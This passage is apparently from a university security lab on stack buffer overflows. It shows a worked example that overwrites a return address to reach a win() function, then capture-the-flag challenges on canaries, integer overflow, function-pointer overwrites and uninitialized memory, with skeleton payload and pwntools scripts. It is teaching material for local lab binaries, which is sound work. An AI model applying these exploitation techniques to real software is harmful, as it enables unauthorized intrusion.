Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xdeadbeef in ?? ()
Excellent. Now we can replace ''0xdeadbeef'' with the address of the ''win'' function.
...
payload += struct.pack('<I', win_addr)  # win_addr: placeholder for the address of win(), taken from the disassembly
$ cat payload | ./buffer_overflow_ret
Please leave a message: Nothing to see here
Well done!
Segmentation fault (core dumped)
Our job here is done. Now it's time for you to smash some stacks.
Keep in mind that buffer overflows are not the only type of vulnerability, but they are very common.
===== Challenges =====
Before venturing forth, consider the following roadmap when approaching a challenge:
* disassemble the binary
* identify the stack buffer
* identify functions which work with buffers
* see if there are any mismatches (declared size vs. index used)
* dynamic analysis in GDB; inject De Bruijn patterns whenever input is read
* determine offset in buffer
* write a script which generates a payload to reliably crash/exploit the target
* keep stdin/connection open for further interaction after obtaining a shell
* ???
* PROFIT
Use the following [[http://security.cs.pub.ro/summer-school/res/arc/06-buffer-management-skel.zip|archive]].
==== 01. Parrot ====
Some programs feature a "stack smashing protection" in the form of stack canaries, that is, values kept on the stack which are checked before returning from a function. If the value has changed, then the "canary" can conclude that stack data has been corrupted throughout the execution of the current function.
We have implemented our very own ''parrot''. Can you avoid it somehow?
Values are little endian. So if you want to send ''0xabcd'' you would send it as ''\xcd\xab\x00\x00''.
When providing input to a program and wanting to maintain connection to its standard input, run:
cat payload - | ./program
Or, if you have a payload generator program such as ''payload.py'', run:
cat <(python payload.py) - | ./program
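A ''payload.py'' for the command above could be sketched as follows. The padding length and the value are placeholders, not the solution to this challenge, and the helper name ''build_payload'' is an assumption; take the real numbers from the disassembly.

```python
#!/usr/bin/env python3
import os
import struct


def build_payload(padding_len, value):
    """Padding followed by `value` as a little-endian 32-bit integer."""
    return b"A" * padding_len + struct.pack("<I", value) + b"\n"


if __name__ == "__main__":
    # Placeholder numbers for illustration only.
    # fd 1 is stdout; writing raw bytes avoids any text encoding.
    os.write(1, build_payload(4, 0xabcd))
```

Writing bytes directly to the file descriptor keeps non-printable values such as ''\x00'' intact, which a text-mode ''print'' may not do.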
==== 02. Indexing ====
More complex programs require some form of protocol or user interaction. This is where the great [[https://github.com/Gallopsled/pwntools|pwntools]] comes in.
Here's an interactive script to get you started:
#!/usr/bin/env python
from pwn import *
p = process('./indexing')
p.recvuntil('Index: ')
p.sendline() # TODO (must be string)
# Give value
p.recvuntil('Value: ')
p.sendline() # TODO (must be string)
p.interactive()
Go through GDB when aiming to solve this challenge. As all input values are strings, you can input them at the keyboard and follow their effect in GDB.
You can inspect the behavior of a program for a given input by doing:
cat payload | strace ./program
That is, you will trace the program being exploited and see ''read()'' or other calls and how they fare for a given input.
==== 03. Smashthestack Level7 ====
Now you can tackle a real challenge. See if you can figure out how you can get a shell from this one.
There's an integer overflow + buffer overflow in the program.
Which four 32-bit values, when multiplied by ''4'', give you, let's say, ''256'' (keeping in mind that the result wraps around modulo 2^32)?
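The arithmetic behind that hint can be worked out in a few lines. The sketch below assumes plain 32-bit wrap-around multiplication and is not tied to the challenge binary; the helper names are made up for this example.

```python
MASK32 = 0xFFFFFFFF   # arithmetic on 32-bit values wraps modulo 2**32


def wraps_to(target, factor=4):
    """All 32-bit x such that (x * factor) mod 2**32 == target.

    Assumes factor is a power of two that divides target.
    """
    step = (MASK32 + 1) // factor
    base = target // factor
    return [base + k * step for k in range(factor)]


def to_signed(x):
    """Reinterpret a 32-bit pattern as a signed int (two's complement)."""
    return x - (1 << 32) if x & 0x80000000 else x


for x in wraps_to(256):
    print(hex(x), to_signed(x), hex((x * 4) & MASK32))
```

Two of the four candidates are negative when read as signed integers, which matters if the program validates the value with a signed comparison.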
In order to run a program that receives command line arguments under gdb, you can do the following:
$ gdb ./main
gdb$ set args arg1 arg2 arg3
gdb$ start
==== 04. Neighbourly ====
Let's overwrite a structure's function pointer using a buffer overflow in its vicinity. The principle is the same.
The ''ptext'' field of the structure is a function pointer. Overwrite it with the address of the ''win()'' function.
==== 05. Uninitialized ====
There's something faulty in the program, and it's **not** a buffer overflow. Provide the proper input to the executable and get a shell.
Do **not** use pwntools for this task.
==== 06. Bonus: Uninitialized 2 ====
There's a small update to the ''uninitialized'' executable and you need to update your solution.
Use ''ltrace'' to understand what's happening differently.
Create a pwntools-based script to solve both the initial executable and the bonus one.
==== 07. Bonus: Birds ====
Time for a more complex challenge. Be patient and don't speed through it.